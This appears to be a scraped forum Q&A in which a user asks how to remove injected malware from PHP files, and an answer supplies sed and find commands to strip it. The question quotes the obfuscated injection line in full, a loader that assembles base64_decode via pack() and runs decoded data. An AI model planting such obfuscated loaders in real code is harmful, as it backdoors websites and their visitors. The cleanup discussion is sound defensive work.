I want to remove these line because it's a injection code:
if (!function_exists('openNewOFormatCall')){function openNewOFormatCall($a, $b){$c=$GLOBALS[' '];$d=pack('H*','6261736536345f64'.'65636f6465'); return $d(substr($c, $a, $b));};$useGitFallYCutCodeU=openNewOFormatCall(3851,20);$useGitFallYCutCodeU("", openNewOFormatCall(3873, 3).openNewOFormatCall(565,3283).openNewOFormatCall(3879, 3));};?><?php
I can certainly remove that line with syntax:
find -iname "*.php" -exec sed -i '/openNewOFormatCall/d' {} \;
The problem is, it would also delete that attaching character at the end <?php
which was required for the php files to work correctly. So i was thinking to delete this line and adding new <?php
afterwards.
please advise.
Just use:
sed 's/.*openNewOFormatCall.*/<?php/' file
If the part behind ?> is variable:
sed -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' file
The question mark needs masking. (.*) captures what follows ?>. \\1 is the backreference to the captured content.
If it works, and after making a backup of valuable data, you will run it with -i
for modifications in place like in your example:
find -iname "*.php" -exec sed -i -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' {} \;
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.